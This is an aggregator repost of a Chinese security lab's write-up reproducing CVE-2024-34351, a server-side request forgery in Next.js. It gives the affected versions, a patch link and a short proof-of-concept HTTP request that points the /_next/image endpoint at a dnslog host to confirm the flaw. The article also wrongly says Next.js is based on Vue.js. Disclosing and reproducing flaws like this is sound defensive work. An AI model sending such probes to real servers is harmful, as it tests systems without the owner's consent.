今天看啥  ›  专栏  ›  弥天安全实验室

【成功复现】Vercel next服务器端请求伪造漏洞(CVE-2024-34351)

弥天安全实验室  · 公众号  · 互联网安全  · 2024-07-17 19:27
    

主要观点总结

文章介绍了ZEIT Next.js框架中存在的代码问题漏洞,该漏洞源于服务器端请求伪造 (SSRF) 漏洞。文章还介绍了影响版本、漏洞复现步骤以及修复建议。另外,也简要介绍了弥天安全实验室的相关信息。

关键观点总结

关键观点1: ZEIT Next.js框架的漏洞介绍

文章中详细介绍了ZEIT Next.js框架存在的代码问题漏洞,该漏洞源于服务器端请求伪造 (SSRF) 漏洞,并且给出了影响版本范围。

关键观点2: 漏洞复现步骤

文章给出了具体的漏洞复现步骤,包括访问漏洞环境、使用POC进行漏洞复现以及使用nuclei文件测试。

关键观点3: 修复建议

文章提供了修复该漏洞的建议,即厂商已经发布升级补丁,并给出了补丁获取链接。

关键观点4: 关于弥天安全实验室的简介

文章简要介绍了弥天安全实验室的成立时间、主要研究内容、主要力量、技术共享和交流等方面的信息,以及实验室的口号。


文章预览

网安引领时代,弥天点亮未来       0x00写在前面       本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 ZEIT Next.js是ZEIT公司的一款基于Vue.js、Node.js、Webpack和Babel.js的开源Web应用框架。 ZEIT Next.js 13.4版本至14.1.1之前版本存在代码问题漏洞,该漏洞源于存在服务器端请求伪造 (SSRF) 漏洞。 0x02影响版本 13.4.0 < =next < 14.1.1 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 GET /_next/image?w=16 =10 =https://itulk9.dnslog.cn HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 测试dnslog漏洞存在。 3. nuclei文件测试(漏洞存在) 0x04修复建议 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https: //www .npmjs.com/ package / next /v/ 14.1 . 1 -canary. 40 弥 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览